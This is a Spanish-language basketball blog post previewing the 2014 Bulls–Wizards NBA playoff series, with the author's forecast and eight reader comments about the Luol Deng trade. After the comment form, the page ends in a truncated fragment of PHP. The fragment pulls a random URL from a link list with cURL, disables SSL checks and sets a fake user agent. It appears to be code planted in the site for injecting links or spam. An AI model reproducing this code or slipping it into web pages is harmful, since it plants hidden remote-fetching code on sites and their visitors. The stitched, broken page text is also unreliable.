PO 2014: Previa Chicago Bulls – Washington Wizards

20 de April de 2014 por Sancho88

Las particularidades de la Conferencia Este nos llevan hasta una eliminatoria calcada en cuanto a records de victorias/derrotas con respecto a la de los Raptors vs Nets (48 para los Bulls por las 44 cosechadas por los Wizards). Desde Toronto apuntan a un ‘mini-tanking’ de los Nets para esquivar a los Bulls en primera ronda, pero más bien parece una auténtica táctica suicida de los Wizards, que han acabado quintos en la general tras un sprint en abril digno de Gareth Bale: 6 victorias y solo 2 derrotas.

Sea como fuere que los Wizards han preferido ir a por los Bulls en vez de ‘forzar’ una eliminatoria más ‘light’ frente a los Raptors, la realidad es que Washington ha completado una gran temporada regular que mejora con mucho todo lo que han hecho en los últimos años. Además, no hay que olvidar que la última vez que superaron una primera ronda en Playoffs fue precisamente contra Chicago en 2005 (4-2), en la época archifamosa de Gilbert Arenas, Antawn Jamison y Larry Hughes. Ahora corren otros tiempos en la capital. John Wall no es ese anotador sublime que fue durante algunos años (hasta que perdió la cabeza) el Agente 0, pero sí es el gran catalizador del juego de los renovados Wizards.

Pasada la hecatombe de los primeros meses de competición, en los que el equipo empezó con un desastroso record de 2-7 en noviembre y maquilló hasta el 9-13 a mediados de diciembre, la trayectoria de los Wizards se enderezó, no sin cierta zozobra durante toda la temporada. La frontera del 50% de victorias los acompañó hasta el All-Star, y después aprendieron a ganar hasta sentirse cómodos y perder la irregularidad como concepto. Ahora están en su mejor momento de forma, con un Marcin Gortat que nadie esperaba en pretemporada y que llegó a cambio de Okafor para dar un verdadero golpe de efecto de cara a los Playoffs. El 2-1 favorable a los Wizards en la serie de la regular frente a los Bulls nos puede dar alguna pista de lo que pasará en esta eliminatoria.

En el otro lado de la sala, la ventaja de campo será un aliado importantísimo para los Chicago Bulls. Mientras muchos esperaban un año por encima de las 50 victorias y con un Derrick Rose recuperando el modo MVP de 2011, las fatalidades volvieron a apoderarse del jugador franquicia de los Bulls. Su rodilla dijo basta en el partido número 10 de temporada regular contra los Blazers. Esta vez fue el menisco. Otro año en blanco, y ahora Adidas ya no es ‘All in for D Rose’; su sustituto se llama Lillard. Los focos no han estado sobre Rose este año. Ni la prensa ni la afición en general han reclamado con demasiado ahínco su vuelta a las canchas. Al menos, ni una cuarta parte de lo que sucedió el año pasado. Antes del All-Star se supo que estaba entrenando con el equipo, y los rumores del regreso volvieron a arreciar. Y ahí estuvo Thibbs para parar el circo mediático. Enseguida confirmó que Derrick Rose no iba a jugar más esta temporada. Ni se le iba a forzar, ni había que esperar su vuelta. Simplemente van a dejar que se recupere sin ningún tipo de presión. Todo apunta a que volverá a vestirse de corto en alguna cancha de la geografía española durante el Mundobasket 2014.

Sin él en el equipo, Thibbodeau tuvo que enfrentarse a un auténtico entresijo de problemas (por si lo de Rose no fuera poco). Los rumores de la salida de Luol Deng, unidos a la mala racha de los Bulls (9-16 antes de navidad, con una horrible racha 3-13 desde la lesión de Rose), marcaron un punto de inflexión. Deng acabó saliendo en una operación maestra para las arcas de Chicago, que aprovechó la indecisión de Lakers para traspasar al sudanés a los Cavaliers a cambio del contrato no garantizado de Andrew Bynum. Después, solo hubo que confirmar el despido del gigante del flamenco y las boleras, y todo cambió. Thiboddeau se inventó un ‘doble’ de Derrick Rose en la figura de DJ Augustin, un agente libre al que nadie quería después de su periplo desastroso por Indiana y Toronto. En el puesto de Deng apareció un Jimmy Butler maratoniano (60 minutos contra los Magic que casi nos da algo, que te vas a deshidratar Jimmy, siéntate a descansar y ponte la rebeca Jimmy, a lo mejor deberías sentarte un rato a que te dé el aire Jimmy; Monaguillo mode off), Dunleavy se multiplicó también para suplir el puesto de dos de Butler, y Gibson volvió a demostrar que si no fuera por el pastizal que cobra Boozer y que obliga a ponerlo en el escaparate de inicio, él ya se habría comido ese premio tan cotizado de 6º hombre y saldría como titular todos los partidos.

Entretanto, Joakim Noah se convirtió en el mejor pívot de la competición junto a Jefferson y se quedó a un triple-doble de igualar el record de Bill Rusell (5) como pívot con más triples-dobles en una temporada regular. Sus hazañas le colocan en todas las quinielas como el principal candidato al DPOY. Además, por si fuera poco, los Bulls también han esprintado en abril con otro 6-2 calcado al de los Wizards. Los chavales vienen fuerte.

Claves de la eliminatoria:

  • El diario de Noah:Todos los que tengáis novia o la hayáis tenido en los últimos 10 años sabéis que, más o menos una vez al mes, cuando estás pensando en ver un San Antonio-Oklahoma, un Indiana-Miami o un Madrid-Barsa, de repente llega tu parienta y te pide, te exige, te ordena, volver a ver esta infumable y cursi película. Ok. A todos nos ha pasado. Pues esta vez la veremos con mucho gusto. La peli no va de dos moñas que se enamoran, se desenamoran, un pobre, la otra rica, se pira, ahora viene, ahora te cuento el cuento, ahora nos morimos juntos… ufff (en estos casos los spoilers dan igual, ya la habéis visto las mismas 20.000 veces que yo). No, la peli va de un ‘rastaman’ hijo de un ex tenista abrebocas que juega al basket de lujo y nos lo va a hacer pasar mucho mejor que viendo la dichosa peli. Esta serie de Playoffs tiene un nombre: Joakim Noah. Por fin se ha convertido en el ‘best case’ que prometía en los Gators. Es el base real de estos Bulls ante la ausencia de Rose, es el pívot del equipo, es la defensa y es el espíritu. Si no fuera por los ‘supermanes’ Durant y LeBron, para muchos Joakim Noah debería ser el MVP esta temporada.
  • ‘House of Guards’: John Wall y Bradley Beal ya tienen apodo oficial. No son los ‘Splash brohters’ de Golden State, sino los locales House of Guards, en claro homenaje a la genial serie rodada en Washington House of Cards. Los dos angelitos promedian 34,4 puntos y un 50% de efectividad contra los Bulls esta temporada. El ‘ironman’ Butler va a tener trabajo extra con estos dos, pero Chicago no va a poder multiplicarse ante las amenazas de los pequeños de Wizards y los tiros abiertos de Ariza y Webster.
  • Partidos a 70 puntos: Chicago aparece como la segunda mejor defensa de la liga al permitir menos de 98 por partido. Wizards son novenos. Sabemos que son dos equipos defensivos. Los Bulls con un estilo clásico de posesiones cansinas y defensas rococas en estático y los Wizards con un impecable físico de conjunto que les permite robar muchos balones y salir rápido a la contra. Pero estamos hablando de Playoffs. Y estamos hablando de la Conferencia Este. Ya tenemos que ponernos en que los partidos como mucho se van a 90 puntos. Y en este caso con dos equipos defensivos van a 80 puntos. Y si a eso le añadimos que Wizards pasan muchos problemas en estático, y Chicago tampoco son los Spurs atacando (antepenúltimos en el ranking ofensivo de la liga), tenemos un caldo de cultivo perfecto para los amantes de los partidos amarrateguis.

Pronóstico: 4-3 para Chicago. El factor cancha se va a acabar imponiendo. No obstante, la serie va a ser larga y es bastante probable que este factor vaya cambiando de un lado a otro durante la eliminatoria. La serie puede arrancar con mucha fuerza por parte de los Wizards, y en ningún caso es descartable que se pongan con 0-2 de inicio, pero en el global se debería imponer el gran estado de forma de Noah, la pizarra de Thibs, el físico de Butler y el factor sexto hombre de Taj Gibson.

Comenta

8 comentarios a esta entrada

  1. Lucho dice:
    #1

    Gran analisis

    Una pregunta: por que fue una jugada maestra el trade de Deng? Es por motivos economicos (no quedaba libre Luol a fin de temporada de todos modos?) o es solo por el haberle hecho mas lugar a Jimmy Butler? O se me escapa algo

      Citar

  2. Sancho88 dice:
    #2

    Por motivos económicos. Por eso pongo para las arcas de Chicago. No queda claro que las aspiraciones de Bulls hubieran sido mayores con Deng, de hecho parece que su salida dio alas al equipo. No obstante, la salida de Deng ocurrió porque no le daban lo que él pedía. Llevaban tiempo negociando la renovación y no se pusieron de acuerdo con la pasta. Ahora como bien dices Deng queda libre, a ver qué consigue este verano. Supuestamente Chicago en realidad quería sacárselo de encima para tener hueco para firmar a Carmelo o LeBron, según se decía. A ver qué consiguen al final, también suena Pau, suena la amnistía de Boozer… veremos. Yo creo que todo va a depender de si Mirotic da por fin el salto o no.

      Citar

  3. Lucho dice:
    #3

    Pero a lo que voy, si quedaba libre ahora en junio, el hueco salarial lo iban a tener disponible de todas maneras.
    O sea, lo unico que ganó Chicago es ahorrarse medio salario (media temporada) de Deng, pero a cambio desprenderse de un buen jugador.
    Tan buen negocio fue? Se pierden de poder utilizar un buen arma en estos PO solo por ese ahorro salarial, pero las posibilidades de contratar en junio esa estrella que vos decis son las mismas que si se hubiera quedado Luol hasta fin de su contrato (diferente si hubiesen contratado en febrero). Butler ya tenia lugar en el equipo, desde los PO pasados creo
    Quizas estoy equivocado, pero no lo veo tan ventajoso como todos lo ven.

      Citar

  4. Miles Davis dice:
    #4

    Lucho:
    Pero a lo que voy, si quedaba libre ahora en junio, el hueco salarial lo iban a tener disponible de todas maneras.
    O sea, lo unico que ganó Chicago es ahorrarse medio salario (media temporada) de Deng, pero a cambio desprenderse de un buen jugador.
    Tan buen negocio fue? Se pierden de poder utilizar un buen arma en estos PO solo por ese ahorro salarial, pero las posibilidades de contratar en junio esa estrella que vos decis son las mismas que si se hubiera quedado Luol hasta fin de su contrato (diferente si hubiesen contratado en febrero). Butler ya tenia lugar en el equipo, desde los PO pasados creo
    Quizas estoy equivocado, pero no lo veo tan ventajoso como todos lo ven.

    Claro, Chicago tampoco iba a dar a Deng a cambio de nada (Bynum, al que cortaron).
    Se llevaron ‘three draft picks’

      Citar

  5. rumbero dice:
    #5

    Voy con ventaja que ya se ha jugado un partido, pero también veo serie larga. Coincido con el análisis y añadiría como clave ese factor X anotador que van a necesitar los Bulls en determinados momentos cuando la defensa rival controle más o menos a Noah. Ese Nate Robinson de la pasada temporada. Lo viene siendo DJ Augustin pero no tengo claro que vaya a ser lo mismo…

      Citar

  6. Sancho88 dice:
    #6

    hostia, de lo que puse ayer na de na. Noah naufraga ante Nené, Beal y Wall fatal en su serie de tiros, el partido se fue a 100 puntos… no di ni una mecawen la mar serena…

      Citar

  7. Sancho88 dice:
    #7

    parezco Deer con mis pronósticos de esta serie, jajaja

      Citar

  8. Lucho dice:
    #8

    Miles Davis: Claro, Chicago tampoco iba a dar a Deng a cambio de nada (Bynum, al que cortaron).
    Se llevaron ‘three draft picks’

    Ahhh perfecto, ahora si. Me faltaba algo como me temía, evidentemente
    Ahora si lo veo beneficioso

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>